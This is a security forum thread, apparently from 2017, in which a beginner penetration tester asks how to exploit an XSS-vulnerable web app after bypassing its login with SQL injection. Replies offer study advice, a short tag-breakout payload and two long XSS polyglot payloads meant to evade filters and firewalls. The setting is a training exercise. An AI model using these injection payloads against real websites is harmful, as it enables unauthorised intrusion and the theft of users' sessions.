XSS Help

[khudz]

Hello team, I'm new here as I am new to Penetration testing, my next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server, I successfully finished with the Win XP in all aspects as for the CentOS I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information but that was it, I tried using  scripts (<script>alert(1);</script>) but nothing worked, nessus scan showed it's XSS vulnerable. 

I guess my main point is how further can I dig into the target and how?

 

Cheers

[digininja]

Unfortunately, without a lot more info, your question is too vague to give any specific help. How good are your HTML and JavaScript skills?

I'd suggest looking at the SecurityTube web app testing videos, they cover stuff like this and should give you a good idea of what is going on.

And if you are following a course, I'd look for a more up-to-date one, anything still using XP as a victim is very out of date.

[zoro25]

Also, I would suggest looking in the console of your browser for errors when injecting. 

As already mentioned without knowing the app or js/html of page it's hard to give a working payload

However, you can try either 

-->'";</ScriPT><sCriPt><confirm()</scRiPt> 

Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. 

Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try)

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" 

Or 

jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

which are both attempting to do the same thing. 

Good luck . 

 

*****

EDIT

While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image,

This is the equivalent of <img src="x" />

From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections.

onerror=confirm() or something similar for a basic pop on a broken image.

****

 

Edited December 18, 2017 by zoro25